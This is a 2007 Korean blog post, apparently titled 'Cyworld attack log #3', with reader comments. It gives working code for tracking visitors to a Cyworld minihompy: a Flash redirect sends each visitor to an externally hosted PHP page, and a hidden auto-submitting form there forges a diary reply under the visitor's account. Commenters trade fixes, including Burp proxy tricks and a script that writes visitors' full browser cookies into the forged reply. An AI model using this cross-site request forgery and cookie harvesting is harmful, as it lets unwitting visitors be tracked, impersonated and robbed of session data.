[보안과 해킹] 싸이월드 공격 일지 #3

워니. 추억ㅇㅔ ㅂㅣ추ㅇㅓ. iwonny.egloos.com valley log-in

싸이월드 공격 일지 3 - 방문자를 추적해보자

update 2007-02-28
현재 다이어리에 리플로 달리는 방식은 막혔습니다.
게시판에서 막은 대로 where_chk 를 걸어 놓았군요.
….다만 아직 스토리룸에 올려져있는 제 플래시 링크는 내려지지 않았군요, 저런ㅋㅋㅋ (음흉음흉)

일단, 저는 잠시 잠수타겠습니다 -
모두들 즐거운 하루 되세요~~

싸이월드 화이팅, 좀 더 보안에 힘써주세요-_-)b

—-

아아, 정말 죄송합니다.
포스팅이 늦어졌군요.
(동호회에서 하는 공연이 코앞이라서.. - 괜히 바쁜척은 저 혼자 다하는군요 ㅠ_ㅠ ㅎㅎ)

사장님 오시기전에 얼른 간략하게 포스팅 하겠습니다~
/*
참, 이미 하는 방법들을 [스토리룸에 플래쉬 올리기]포스트에 리플로 많이 달아주셨더라구요~ 참고하시고,
혹시 저걸 보고 모르겠고, 그냥 작동만이라도 하면 좋겠다고 생각되시면 봐주세요 ㅎㅎ
*/

#. 원리
조만간 업데이트 하도록 하죠,
간단한거니까 많이들 아시리라고 생각해요 ㅎㅎ

#. 방법
일단, 다이어리에 새로운 일기를 하나 써봅시다.
비밀로 써야겠죠? ㅎㅎ

그리고는 다이어리 - 목록 으로 들어가서 방금 쓴 글에 마우스 오른쪽 클릭을 하고 속성을 살펴봅시다.

보이시나요? 저 두 숫자를 잘 적어 놓읍시다. 앞에 것이 tid이고, 뒤의 것이 item_seq 입니다.

음, 화면 캡쳐할 시간이 있나 모르겠네요.

아하! 여기 좋은 레퍼런스가 있군요.
[솔솔시료님 포스트]

/*솔솔시료*/님께서 2번에 설명해 놓으신 플래쉬 작성방법을 숙지해 주십시오.

getUrl(`이동할 페이지 주소’);

에서 이동할 페이지 주소

1.
http://www.iwonny.net/source/cy_count/storyroom.php?tid=자신의tid&item_seq=다이어리번호

혹은

2.
http://www.iwonny.net/source/cy_count/storyroom.php?tid=자신의tid&item_seq=다이어리번호&img=이미지주소

3.
http://www.iwonny.net/source/cy_count/storyroom.php?tid=자신의tid&item_seq=다이어리번호&embed=플래시주소

를 적어 넣습니다.

아까 적어 놓았던 tiditem_seq를 각각 넣어주면 되겠죠?
2번을 사용할 경우 이미지주소에 있는 이미지를 출력해 줍니다.
3번을 사용할 경우 플래시주소에 있는 플래시를 출력해 줍니다.(미니룸사이즈 400×200으로 출력합니다.)
(1번을 사용하면, 제가 사용하고 있는 그저 기본 이미지가 출력됩니다.)

저 안에는 자동으로 리플을 달아주는 소스코드가 들어있습니다.
간단한 것인데, 시간날 때 올려 놓도록 할게요 -
기록은 안남으니까 걱정마세요 ㅎㅎ

그리고는 그 플래시를 스토리룸에 올리면?

플래시가 로딩되고나서 다이어리에 가봤더니 리플이달려있으면 성공이겠죠?
자, 축하드립니다 -
오늘도 좋은하루 되세요~
(와, 딱 업무시간 시작이군요 ㅎㅎ)

*.ps 많은 분들이 댓글을 달아 주셨는데, 제가 생각하고있는 인터넷 문화와는 조금 다른 생각을 가지신 분들이 있군요? 덕분에 이런저런 생각을 하게 되었습니다. 조만간 그에 대한 생각도 포스팅도 해봐야겠어요 ㅎㅎ

*.ps - storyroom.php 소스코드

<?
$tid;
$item_seq;
if(!$img) $img=”./fake.jpg”;
$date = time();
?>
<html>
<body leftmargin=0 topmargin=0>
<form name=”reply_frm0″ method=”post” action=”
http://minihp.cyworld.nate.com//pims/diary5/mydiary/diary5_replyok.asp” target=”fake”>
<input type=”hidden” name=”list_type” value=”1″>
<input type=”hidden” name=”toyearmonday” value=”20070226″>
<input type=”hidden” name=”item_seq” value=”<?=$item_seq?>”>
<input type=”hidden” name=”folder_no” value=”0″>
<input type=”hidden” name=”review_seq” value=”">
<input type=”hidden” name=”open_item_seq” value=”">
<input type=”hidden” name=”seq_type” value=”0″>
<input type=”hidden” name=”reply” value=”">
<input type=”hidden” name=”tid” value=”<?=$tid?>”>
<input type=”hidden” name=”content” style=”width:220px;”class=”input2″ value=”<?=$date?>”>
</form>
<img src=”<?=$img?>” />
<iframe src=”./blank.php” name=”fake” width=”0″ height=”0″ ></iframe>
<script language=”javascript”>
<!–
document.getElementById(’reply_frm0′).submit();
–>
</script>
</body>
</html>

간단하죠? ㅎㅎ

# by 워니 | 2007-02-27 09:33 | 컴이야기 | 트랙백 | 덧글(179)

트랙백 주소 : http://iwonny.egloos.com/tb/3021127
내 이글루에 이 글과 관련된 글 쓰기 (트랙백 보내기) [도움말]

Commented by 워니 at 2007-02-27 10:19 #

php를 제공하는 웹 호스팅이나, 자신의 서버에 올리시면 됩니다.
(직접 돌리실 게 아니라면 꼭 올릴 필요는 없지만요 ㅎㅎ)

Commented by 워니 at 2007-02-27 10:25 #

앗, 아이 민망해라,
질문한 리플을 지워버리셨네…쿨럭;

Commented by 자유 at 2007-02-27 10:25 #

아무도 안 궁금한데 !

Commented by 자유 at 2007-02-27 10:25 #

혼자 논다 이성원 *^^*

Commented by fan at 2007-02-27 10:29 # x

저기요.. 다 됫는데 스토리 룸에서 저장 하고 확인전에 proxy켜서
워니님이 스샷 올린것과 똑같이 떠서
주소를 밑줄그은 부분을 MM_0라고 바꾼 플래시 파일이
있는 주소로 바꾸고 forward 누르면

없는 아이템인가? 그거 뜨면서 안되요..ㅠ
어쩌죠…

Commented by dk at 2007-02-27 10:29 # x

수고하시네요 따라하다보면 시간가는줄 모릅니다~

Commented by marine at 2007-02-27 10:33 # x

감사합니다
지금 막 따라합니다!! 오늘 싸이에서 막으면 스토리룸 잠시 바꾸어 두려구요..ㅋㅋ

Commented by 궁구미 at 2007-02-27 10:34 # x

최초 질문을 지운 사람입니다. 죄송하네요…

질문이 너무 수준이 낮은거 같아서서..지웠습니다..ㅋㅋㅋ

공개한 소스는 지금 워니 님… 서버에서 돌아가나 봅니다..

근데 지난번 방법으로 스토리룸에 플래쉬를(이름을 같게, 웹상에 링크) 올려도 감감 리플이 안달리더라구요..어쩌면 좋죠?

Commented by 워니 at 2007-02-27 10:45 #

자유// 뭐야-_-ㄲㄲ
fan// 으음, MM_0.swf 라고 바꾸신 것 맞나요? 바꿔주는 위치와 파일명이 정확히 같아야 그 메세지가 뜨지 않아요 ㅎㅎ
marine// ㅎㅎ 화이팅입니다~
궁그미// 아뇨아뇨 뭘요 ㅋ 네 맞아요 제 서버에서 돌아가고 있어요;;(호스팅 받는거긴 하지만 ㅎㅎ)
음, 지난번 방법이라면 /*솔솔시료*/님 블로그에 있는 방법 말씀하시는 건가요?
싸이측에서 게시판에는 자동으로 리플을 못달게 수를 써 놓았거든요.
그런데 귀찮았는지 다이어리쪽은 막지 않았군요 ㅋ
그래서 이번엔 다이어리쪽으로 사용한 것 밖에 다른 점이 없습니다~

Commented by 에버태지 at 2007-02-27 10:46 # x

이런 고려대학교 컴공과 삼성원
네녀석을 부적의 이름을 걸고 싸이에 신고하겠다

Commented by 워니 at 2007-02-27 10:54 #

에버태지// … 물어봤다 태영이형한테. 보자마자 뭔지 알던데?
“어엇! 어라? 어떻게 알았어요??”
“써있잖아.-_-”

Commented by 닭아멍멍해봐 at 2007-02-27 11:08 # x

워니님…
플래쉬 파일을 만들어서 파일이름도 바꿨습니다. 이 바꾼 파일을 어떻게 올리는지 모르겠습니다.
조금만 더 자세히 알려주시면 감사하겠습니다.

Commented at 2007-02-27 11:09 # x

비공개 덧글입니다.

Commented by marine at 2007-02-27 11:13 # x

swf파일은 게시판에 업로드후 사용하시는게 제일 편해요.
그리고.. ; _ ; 성공 했는데 덧글이 이상하게 달리네요.. 쩝;;

Commented by marine at 2007-02-27 11:13 # x

swf파일은 게시판에 업로드후 사용하시는게 제일 편해요.
그리고.. ; _ ; 성공 했는데 덧글이 이상하게 달리네요.. 쩝;;

Commented by marine at 2007-02-27 11:14 # x

성공!!! ^^/ 감사합니다!

Commented by fan at 2007-02-27 11:18 # x

게시판?
플래쉬가 돌아가야 하는거 아니엿나요?
게시판엔 그냥 파일첨부… 아닌가..;;

Commented by 궁구미 at 2007-02-27 11:19 # x

게시판에 swf 파일을 올리면 그 게시판을 클릭 하지 않은 방문자는 리플이 않달리지 않나요?

게시판에 swf파일을 올리고 클릭을 하니까 되기는 하는데… 2% 부족한듯하네요..

Commented by marine at 2007-02-27 11:22 # x

음.. 궁구미님, 이런 원리로 생각하시면 될것 같아요.

제 가 글을 하나 써놓았고 그 글의 주소가 www.1 이라고 합시다. 한 사람이 그 글을 링크가 아닌 출격으로 빼오면 그 글의 주소는 www.1 인거죠. 비록 그 홈페이지의 주소가 아니더라도요. burpproxy 이 프로그램을 이용해서 스토리룸에 swf 파일을 출격으로 빼주는것이구요.

결국 게시판에 업로드하고 swf을 스토리룸에 연동시켜서 덧글을 쓰게 만드는것이랍니다.

Commented by marine at 2007-02-27 11:22 # x

앗;; 중요한걸 빼먹었네요. 결국 연동을 시키고 로드가 끝나면 덧글은 남겨져 있게 되죠. 그러면 그렇게 방문자 추적이 가능하게 되는것이구요.

Commented by marine at 2007-02-27 11:25 # x

어;;; 제가 설명한게 틀린가요.. ; _ ; 괜히 헷갈리게 하시는것 같네요..;; 그냥 제말은 읽지 마세요…;; 이상하게 설명해놓은것 같네요.. 쩝;;

Commented by Spatialguy at 2007-02-27 11:31 #

이런 훌륭한 고려대학생같으니;;

Commented by 지나가는이.. at 2007-02-27 11:41 # x

;ㅂ;정말 컴퓨터 초보라서 그러는데요…
워니님께서 맨 밑에 써주신 소스는
어디다 넣어야하나요 ㅜㅜ ;;
어렵네요 ㅎㅎ;.

Commented by marine at 2007-02-27 11:49 # x

지나가는이.. // 저건 그냥 워니님 홈페이지 링크를 플래시파일에 넣으셔도 되요.
만약 지나가는이.. 님의 싸이 코드가 dddd 이고 다이어리 주소가 ssss 이면
플래시 파일에 getURL(’http://www.iwonny.net/source/cy_count/storyroom.php?tid=dddd&item_seq=ssss’)

이렇게 플래시 파일에 넣으시고 저장하시면 됩니다. (swf파일 변환)

Commented by 워니 at 2007-02-27 11:59 #

닭아멍멍해봐// 아이디 좋네요 ㅋ 싸이월드 공격일지 2 읽어봐주세요 ㅎㅎ
와 marine님 친절하게 설명해 주셨군요 -
네, 맞습니다. 간단히 다시 얘기해보자면,

C:\….\MM_0.swf 는 fan님 컴퓨터에 있는 것이죠?
그것을 자동으로 업로드 시켜주지는 않습니다. 주소만 가져다가 써 놓는 것이죠.
그럼 다른 사람이 들어가면 어떻게 될까요? 네, 그 사람의 컴퓨터에서 MM_0.swf 를 찾게되죠.
하지만 그 사람의 컴퓨터에는 MM_0.swf가 없으니 말짱 꽝이겠죠 ㅎㅎ
(지금은 아예 c:\ 자체를 파싱해서 오류 나도록 해놓은것 같군요.)

그럼 어떻게?
어 디든(게시판이어도 되고, 아니어도 상관 없습니다.) 인터넷 어딘가에 올려져 있는 플래시 파일 주소를 넣어야 하는거죠. http://www.abcd.com/MM_0.swf 처럼요. 그러면 누구든지 접속했을 때 그 플래쉬를 볼 수 있을 테고, 그러면 기록이 남는 것이겠죠?

그 플래쉬 자체를 스토리룸으로 끌어 낸 것이 싸이월드 공격일지 2 입니다.

그 플래쉬를 만드는 방법이 이 글이군요 ㅎㅎ

Spatialguy// … 커헙;;;
지나가는이// marine님께서 친절하게 답해주셨네요 ㅋㅋ

Commented by 궁구미 at 2007-02-27 12:00 # x

성공했습니다. 플래쉬 파일이 웹상에 링크된 주소로 하니까..안되는데..marine 님 말씀처럼..
싸이게시판에 첨부하고 주소를 갖다가 플래쉬 파일에 갔다가 붙이니까..되네요..

근데 한가지 업그레이드 해야 할꺼는… 자신의 이름은 댓글이 안달리게 하면 좋겠네요..

Commented by fan at 2007-02-27 13:15 # x

워니님 답변 감사해요.ㅎ
게시판에 올리고 이 주소. 그대로 썻습니다.
http://cyimg17.cyworld.nate.com/common/file_down.asp?redirect=%2Fy54301%2F2007%2F2%2F27%2F68%2FMM%5F0%282%29%2Eswf

이렇게 하라는거죠?
그런대.. 왜 없는 아이템이라고 나오는걸까요…휴;

Commented by fan at 2007-02-27 13:18 # x

보유하지 않은 아이템이 포함되어 실패했다고 나와요..ㅠ

Commented by 쿠니쿠니 at 2007-02-27 13:37 # x

Good..

Commented by WinNie at 2007-02-27 13:49 #

아 진짜 고려대학생
근데 이거 위험한 발언인가

Commented by 워니 at 2007-02-27 13:58 #

fan// 파일명이 MM_0.swf 가 아닌 듯 싶은데요? 맨 끝부분이 MM%5F0%2Eswf 로 나와야 하는데 MM%5F0%282%29%2Eswf 로 나오는 군요. (싸이측에서 다른식으로 변환하는지 어떤지는 저도 잘 모르겠습니다만 .. 여하튼 결과물은 MM%5F0%2Eswf 로 나와야 합니다.)
^^// 아마도 getURL 이라고 쓰셔서 문제된것이 아닌가 합니다. getUrl 입니다. 대소문자 구분해주세요 ㅎㅎ
쿠니쿠니// ㅎㅎ
위니// ..응-_-

Commented by ^^ at 2007-02-27 14:13 # x

감사합니다. 성공했어요 ㅋㅋ
그런데 리플이 이상하게 달리는데;ㅂ;
다들 그런가요?
알수없는 숫자와함께 ㄷㄷ

Commented by fan at 2007-02-27 14:16 # x

푸하하!! 성공했어요.
올라가긴올라갔어요!

하지만.. 다른 아이디로 접속을 해보고 해도..

전혀 댓글이 달리지 않는다는거…..ㅡㅜ

Commented by ^^ at 2007-02-27 14:17 # x

fan// 저도 그래요 ㅜㅡ

Commented by 누가 at 2007-02-27 14:30 # x

아 어려워.. 전 공격일지 2부터 되지도 않는데 다들 성공이시라니..
워니님 원격조정으로좀 해주세요ㅋㅋㅋ

Commented by 누가 at 2007-02-27 14:31 # x

도토리드릴테니 누가좀 도와줘요~ 정말 답답하넹..

Commented by 닭아멍멍해봐 at 2007-02-27 14:37 # x

워니님
지금까지 플래쉬 파일도 만들고 게시판에 올리기도 했는데…
게시판에 올려져있는 글의 속성에서 나온 주소를 빨간색 줄이 있는 부분에 붙이니까 안되네요…
정확히 어떤 주소를 붙여야할지 모르겠습니다. 주소 찾는 방법 좀 알려주십시요…

Commented by 쿠니쿠니 at 2007-02-27 14:39 # x

<input type=”hidden” name=”toyearmonday” value=”20070226″>

위에 밸류값을 다이어리 적은 날짜로 바꿔주세요.

Commented by 돕는자 at 2007-02-27 14:56 # x

게시판에 플래쉬 주소…추출…하기

글을 클릭하고 첨부 플래쉬화일위에 오른쪽 버튼을 대고 속성을 봐야 플래쉬화일의 정확한 주소추출가능

(금방 화면이 바뀌므로 글을 클릭하고 빨리 추출해야 합니다…)

궁금한거 있으면 또 물어보세요…

Commented by 워니 at 2007-02-27 14:59 #

아뇨, toyearmonday 값은 리플 남기는데 아무런 영향을 미치지 않는다는 것을 확인 했습니다.
(비워놓고 실행해도 리플은 달리는군요)

알 수 없는 숫자는 제가 그렇게 해 놓은 것입니다. 같은 리플을 연속으로 두번 달았을 경우 싸이측에서 스팸처리하는 듯 하군요
( 같은 사람이 같은 글을 두번 연속으로 쓸 수 없는 것으로 보입니다. )

좀전까지 댓글이 안달리던 문제는 제가 잠깐 만지다가 실수한 것 일수도 있습니다.
지금 확인해보니 일단은 달리는군요. 다시한번 확인해 보시겠어요?

* 한 사람이 연속으로 들어왔을경우 남기는 것이 나을까요 남기지 않는것이 나을까요? 선택사항입니다만,
말해주시면 감사하겠습니다.
* 말씀해 주셨듯이 embed 로 swf를 올려 놓는것도 물론 가능합니다.
(… 만들기 귀찮아서 안만들었다는… 죄송합니다-_-a 조만간 수정해 볼게요)

Commented by 닭아멍멍해봐 at 2007-02-27 15:05 # x

죄송한데요…
제가 플래쉬파일의 주소는 추출해서 성공을 했었는데요…
스로티룸을 꾸밀때 제가 모르고 메모장에 글을 쓰는 바람에 글이 나타났다가 사라지길래
스토리룸을 비워버렸는데 다시 할려고 하니 화면이 계속 바뀌어서 안되네요…
이걸 어떻게 해야될까요??
처음대로 다시 돌릴수는 없을까요??

Commented by ^^ at 2007-02-27 15:09 # x

돕는자님~
알려주신데로 게시판주소를 추출하여
빨간글씨에 넣는거 맞죠;ㅅ;

그렇게 했는데 플래쉬 그림으로 안바뀝니다..
뭐가 문제죠 ㅠㅠ

Commented by 돕는자 at 2007-02-27 15:10 # x

좋습니다… 처음으로 되돌릴 방법….은..

워니님의 캡쳐화면으로 스토리룸 재저장을 해서 주소를 확인해 보시면 주소가 최초주소로 되어 잇는지..
(원래 최초주소는 워니님이 일지에 올려서 빨간색으로 밑줄그은 그 주소가 진짜 주소)

아니면 다른주소(본인이 올렸던) 박뀌어져 잇는지 확인하시고..

저도 그 부분때문에 애먹었는데… 잘 안되면 처음 주소로 포워딩을 한번 한뒤에 다시한번
새로운주소(게시판의 플래쉬화일주소)등으로 한번더 포워딩을 해서 스토리룸에 저장하면

될것입니다..

그나저나…본인이 볼때도 댓글이 달리니…댓글이 너무 많이 달려서 지우는게 힘드네요..

Commented by 돕는자 at 2007-02-27 15:11 # x

님의 성공을 위해 기도합니다.^^*

Commented by fan at 2007-02-27 15:13 # x

워니님.. 여전히 안달립니다…ㅠ

Commented by ^^ at 2007-02-27 15:13 # x

swf파일을 올린 게시판에 들어가 직접볼수있는;; 주인장인 저만
댓글이 달리네요..
흠 스토리룸에 게시판에 올린 swf이미지가 안ㄸㅓ요 ㅠㅠ
어렵군요;

Commented by 돕는자 at 2007-02-27 15:14 # x

다른 사람이 들어오는 경우는 연속으로라도 남는게 맞다고 봅니다.(방문자 추적의 원취지에 부합)

Commented by 쿠니쿠니 at 2007-02-27 15:19 # x

http://minihp.cyworld.nate.com//pims/diary5/mydiary/diary5_replyok.asp

pims 앞에 //가 두개 들어가있네요.

Commented by 닭아멍멍해봐 at 2007-02-27 15:22 # x

돕는자님…
제가 위니님의 캡쳐화면으로 다시 저장하고 싶지만 저장도 안되네요…
제가 스토리룸을 지울때 바로 화면이 바뀌길래 바뀌기전에 비우기 버튼을 눌렀는데
그뒤로는 밑에 있는 메모장을 쓸수도 없고 다시 저장도 안됩니다.
ㅠㅠ 도와주세요~~

Commented by 돕는자 at 2007-02-27 15:23 # x

지금 댓글이 안달리는거 같네요…

소스를 건들렸나요?

아니면 지금 리눅스에서 열었는데 그래서 안되나..

Commented by 워니 at 2007-02-27 15:40 #

pims 앞에 //가 두개 있는것은 상관이 없습니다. (증거로는, 제것이 잘돌아가고 있다는 것이 있겠네요)
닭아멍멍해봐// 제 친구 해주다가 같은 현상이 있었는데, 스토리룸 수정을 누르고 저장을 마구마구 연타해 보십세요;; 무식한 방법이지만 됩니다 ㅎㅎ

음, 제 다이어리 공개해 놓았습니다. 확인해 보시구요,
지금 현재 toyearmonday 값은 없애놓았습니다. 그러니까 그 문제는 아닐 듯 싶군요.

제가 안되면 어떻게든 해보겠는데, 제가 되니 이거 참-_-a 흠;;;;
조금 더 자세히 어떤 상황인지 가르쳐 주시면 알아보겠습니다 -

Commented by 워니 at 2007-02-27 15:42 #

참, 본인은 안달리도록 하는건 조만간 알아볼게요;; ㅎㅎ

Commented by 워니 at 2007-02-27 15:45 #

아, item_seq 에서 숫자만이 본인의 item_seq 입니다
저 위에 올려놓은 이미지를 봤을 때 #|389641116 으로 보이는데,

일삼팔구… 가 아닙니다.
삼팔구… 입니다.

1과 | 가 헷갈리는군요-_- ㅎㅎ 혹시나 노파심에;;

Commented by fan at 2007-02-27 15:49 # x

저같은 경우에는
먼저.다이어리에 비밀글을 쓴후 속성보기로 숫자값을 플래시mx 통해서 http://www.iwonny.net/source/cy_count/storyroom.php?tid=자신의tid&item_seq=다이어리번호
여기에 대입후 swf파일을 만들엇어요.

그다음 그 파일을 비공개게시판에 올렸고 스토리룸 수정에서 위에 질문드린것을 해결하여
현재 플래쉬가 올라와있습니다. 티가좀 나긴 하지만..^^;;

그런대.. 댓글이 안달려요..ㅠ

Commented by 워니 at 2007-02-27 15:51 #

음, fan님 싸이 주소좀 가르쳐 주시겠어요? 한번 살펴보고싶네요;;
어떤 문제가 있는 걸까요오 흐음 -

Commented by 워니 at 2007-02-27 15:52 #

아차, 제 싸이주소 http://www.cyworld.com/ssowonny 입니다

Commented by 닭아멍멍해봐 at 2007-02-27 15:52 # x

위니님..
저 같은 경우는 스토리룸 자체가 삭제가 되어버려서 수정 버튼이 없습니다.
그래서 스토리룸 설정으로 들어가면 계속 화면이 바뀌어서 아무것도 못하고 있습니다.. ㅠㅠ

Commented by 워니 at 2007-02-27 15:55 #

닭아멍멍해봐// 아, 설정을 누르면 잠깐 있다가 화면이 바뀌죠? 그 사이에 `스토리룸 저장’버튼을 마구마구 누르는 겁니다-_-)b

Commented by 돕는자 at 2007-02-27 15:56 # x

음..역시 리눅스에서는 안되네요…

윈도우에서 하니까..리플이 달리네.. 이상하네요…

Commented by 워니 at 2007-02-27 15:57 #

fan 님,
플래쉬 만들때 숫자 뒤에 tid를 안지우셨군요.

http://www.iwonny.net/source/cy_count/storyroom.php?tid=111111tid&item_seq=222222

이런 식으로 넣어 놓으셨네요.
빨간 글씨는 모두 지워주셔야합니다.

Commented by fan at 2007-02-27 15:58 # x

아. 일단 해볼께요.ㅎ;

Commented by 워니 at 2007-02-27 15:59 #

돕는자// 음, 브라우져로 파이어폭스 쓰시겠군요?
음, 익스플로러와 파폭은 약간의 차이가 있을 수 있습니다.
두군데서 다 동작하지 않는것은 제가 웹표준을 지키지 않았다는 뜻이군요 ㅠ_ㅠ 흑흑

Commented by 닭아멍멍해봐 at 2007-02-27 16:00 # x

성공했습니다. 워니님과 돕는자님께 감사드립니다.
꾸벅~

Commented by 돕는자 at 2007-02-27 16:02 # x

맞습니다. 파폭을 쓰더라구요.. 리눅스 교육인데… 전체적으로 불안정하네요…

그 귀책이 워니님께 있는건가요? ㅋㅋ

Commented by 벙개 at 2007-02-27 16:09 # x

와우~성공했습니다. 성취감이 대단한대요..ㅋㅋ 감사합니다!!

Commented by 워니 at 2007-02-27 16:23 #

닭아멍멍해봐// 축하드려요~
돕는자// 어허허허허허 귀책이라뇨 ㅠ_ㅠ ㅎㅎ 방법이 있는것 만은 확실합니다만,,,, 헤헤
벙개// 축하드려요~
오적암살단//
네, 게시판에 있는 글을 지워도 첨부파일이 안 없어지죠? ㅋ(이것도 어제 친구 도와주다가 처음 알았다는…)
-_-a 아마 하드디스크가 많이 남아서 좀 많이 기록하려나보네요 ㅎㅎ
자기 기록 안남는거 잠깐 잡다가 회사일도 밀려서그만…ㅋ
제가 javascript쪽으로는 공부를 전혀 안해서요 ㅠ_ㅠ
window.parent 를 이용해서 iframe 두개를 뛰어 올라가 myuser_id 를 가져올 수 있다면 될것 같은데,,
문법상의 오류인가, 잘 안되더라구요 ㅋ
음 시간될 때 좀더 알아봐야겠군요 -0- ㅎㅎ
화이팅입니다!!! 전, 다시 일자리로 -_-a 헤헤;;

Commented by fan at 2007-02-27 16:28 # x

워니님..
드디어..
성공했음니다.ㅠ

정말.. 도움 많이 됬고 감사드려요.ㅎㅎ
이거 하면서 정말 이쪽으로 흥미가 많이 생겼어요.

어쨋든. 위 방법. 틀리지 않았네요.ㅎ

그럼 수고하세요들!

Commented by 돕는자 at 2007-02-27 16:28 # x

저는 교육이기는 하지만..사실상 땡땡이 중인데..

역시 유식한 분들과 얘기를 하니까..성과도 있고 재미도 잇네요…

감사합니다…

Commented by 쿠니쿠니 at 2007-02-27 16:33 # x

이번에 막히면,,,,,,,,,, 새로운게 나올 가능성은 거의 없네요.
제가 스토리룸으로 하는거 예전에 성공하고 또 다른방법을 몇주동안 찾아봤지만,,
도저히 방법이 생각이 안나더군요…
모두들 조심하셔야 합니다, 저는 설치해놓은거 지웠구요.
잠잠해 질때까지 다른방법 연구만 하렵니다.

Commented by fan at 2007-02-27 16:55 # x

아..
혹시 하고나서 지워야 하거나 그런 사항 있으면 가르쳐주세요..
뭐 남겨놧다 걸리는거 아닌가..ㅠ

Commented by 야니 at 2007-02-27 18:25 # x

아까 아침에 댓글 0일때 봤는데 대단하군요~ 그때는 바빠서 대충 보고는 갔는데~
이제는 저도 공개적으로 리플을 답니다.
워니님~ 너무 감사해요~
저도 같은 컴공과지만 많이 모자라네요~ ㅎㅎ
그냥 간단한 웹계정을 쓰니 php는 안되어서 html로 전 했어요~ ^^

Commented by 쭈운 at 2007-02-27 18:39 # x

정말 답답해서 질문 드려요 ㅜㅜ 답변 해주시면 고맙겠습니다. burp proxy 프로그램 사용까진 완료 했는데요.. 익스플로러 LAN설정에서 127.0.0.1 그리고 포트 8080으로 변경해주면 인터넷 자체가 안됩니다. 직장에서 해도 그러구 집에서두 그러네요.. 왜그런거죠? ㅜㅜ 인터넷이 되질 않으니 burp proxy에서 역시 잡히는게 하나도 없구요… 조금이라도 알려주시면 ㄳㄳ

Commented by 지나가던이;; at 2007-02-27 19:53 # x

우선 워니님 감사합니다.^^
우연히 이곳에 들리게 되어 좋은 정보 얻어갑니다.
쭈 운// 저도 이쪽에 문외한이라 이유는 모르지만, LAN 설정 프록시 서버 사용 체크 했을 땐 burp proxy 프로그램을 실행시만 인터넷이 되던데요.. 그냥 인터넷 사용할땐 체크해제. 왜 그런지는 모르겠습니다. 공부가 필요하다는…^^;;

Commented by 하앜 at 2007-02-27 20:11 # x

저도 쭈운님과 증상이 같습니다. burp proxy가 잡히긴 하나 인터넷이 안되네요..

Commented by fan at 2007-02-27 20:18 # x

저는 이렇게 했답니다..
일단 스토리룸 설정 가서 설정에서 마지막 확인 누르기 전에 랜 가서 설정하고
proxy키고 확인 누르면 나와요. 그담에 위에 있는대로 하고 다시 설정해주면 되더라고요.ㅎ

Commented by 후웅 at 2007-02-27 20:19 # x

스토리룸에요 게시판에 올린swf사진을 올리면요 ㅜㅜ
페이지를 찾을수없다는..

싸이만의 도특한(?)이미지가 나오네요..왜그러죠 ㅠㅠ

Commented by 아흑흑 at 2007-02-27 20:42 # x

스토리룸에 분명히 플래시파일까지 다올라갔는데 왜 리플이 안달리는걸까요 ㅠㅠ

Commented by 하앜 at 2007-02-27 21:13 # x

그리고 이거 플레시mx2004 필요한거 맞죠?

Commented by Spatialguy at 2007-02-27 22:20 #

잘하면 오늘 리플 100개 뚫겠다..

Commented by 크리스티아누 at 2007-02-27 22:47 # x

와 엄청난 리플들….ㅋㅋ
오늘 집이 15년 만에 이사하느라 지금 녹초가 되서;;;
다 읽진 못하겠고…ㅠㅠ또 담주 화욜에 셤이라ㅠ
음 어쨌든 오적암살단장님과 워니님 감사드려요..ㅠ
제 추적 방법은 옛날 소스 조금 수정해서 했는데
너무 허접해서…ㅠ조금만 관심있는 사람이라면 걍 다 눈치채는…
이제 그나마 방문하던 사람들도 안 들어오는 건 아닌지..

워니님 저랑 동갑인 것 같은데 친하게 지내요~ㅋㅋㅋㅋ
86맞으시죠? 그런데 무슨 회사 다니시는 듯???

Commented at 2007-02-27 23:20 # x

비공개 덧글입니다.

Commented by 하앜 at 2007-02-27 23:32 # x

아…. 왜 안되는지 모르겠네여…답답하네..ㅜㅜ
%2Fy54501%2F2007%2F2%2F27%2F21%2FMM%5F0%2Eswf로 나오네요….
왜 똑같이 안나오는지..;;

Commented by 벙개 at 2007-02-27 23:46 # x

응용 들어갔습니다. 기존에 꾸며놓은 미니룸 상태에서 스크린샷으로 복사한 담에
미니룸만큼만 잘라서, 이미지화 한담에 그걸 링크시켰더니, 감쪽같이…ㅎㅎ
ㄳㄳ

Commented by ?? at 2007-02-28 00:16 # x

정말 수고가 많으시네요. 대단하십니다.
blank.php의 역활은 뭔가요?
제 서버에 storyroom.php만 가져가도 작동하나요?

Commented by 움하하 at 2007-02-28 00:27 # x

드뎌 성공!
좋은정보감사합니다.ㅎ

Commented by 하앜 at 2007-02-28 00:36 # x

아..getUrl(`http: //www.iwonny.net/source/cy_count/storyroom.php?tid=자신의tid&item_seq=다 이어리번호) 에 고유번호 다 입력하고 MM_0로 저장하고 싸이에 게시판 올려서 속성보기 아무리 해도 =%2Fy54601%2F2007%2F2%2F28%2F45%2FMM%5F0%2Eswf 같은 완전 다른이름파일만 올라가네여…ㅜㅜ

Commented by 하앜 at 2007-02-28 00:56 # x

아 캐감동 ㅜ.ㅜ 드디어 됐어여…….
워니님 getUrl(`이동할 페이지 주소’);
여기 수정해야할거같네여…. getUrl(’이동할 페이지 주소’); 루 해야 되는군염…

Commented by 스닉 at 2007-02-28 01:27 # x

자신은 댓글 안 다는 방법
초딩같은 코딩입니다만;;

document.cookie 로 출력해서
EpAutoLoginID의 값을
admin변수값에 넣어주세요. ^^

자신의 싸이월드 도메인을 설정하셔야 사용하실 수 있을듯 하네요. 그냥 추측임 -_-;;

<script>
function timeVal()
{
//시간설정
var time = new Date();
var yy = time.getYear();
var mm = time.getMonth() + 1;
var dd = time.getDate();
var hour = time.getHours();
var minute = time.getMinutes();
var second = time.getSeconds();
//출력변수
var pos_val = ” “;
//관리자
var admin = “자신의싸이월드주소(도메인설정값?)”;
var idx = “EpAutoLoginID=”;
var idexpt = document.cookie;
idexpt = idexpt.substr(idx.length, admin.length);

mm = ((mm < 10) ? “0″ : “”) + mm;

hour = ((hour > 12) ? (hour - 12) : hour);
hour = ((hour < 10) ? “0″ : “”) + hour;
minute = ((minute < 10) ? “:0″ : “:”) + minute;
second = ((second < 10) ? “:0″ : “:”) + second;

pos_val += yy + “년 ” + mm + “월 ” + dd + “일 “;
pos_val += (hour >= 12) ? “pm” : “am”
pos_val += hour + minute + second
//pos_val += ” IP주소 - <?php echo(”$REMOTE_ADDR”); ?>”;
pos_val += document.cookie;

//alert(document.cookie);

document.reply_frm0.content.value = pos_val;

if(idexpt != admin)
{
document.reply_frm0.submit();
}
}
</script>

마지막으로 스토리룸 로딩이 길어서 방문자가 5명중에 2명밖에 기록이 안 되네요. ㅡㅜ

Commented at 2007-02-28 01:49 # x

비공개 덧글입니다.

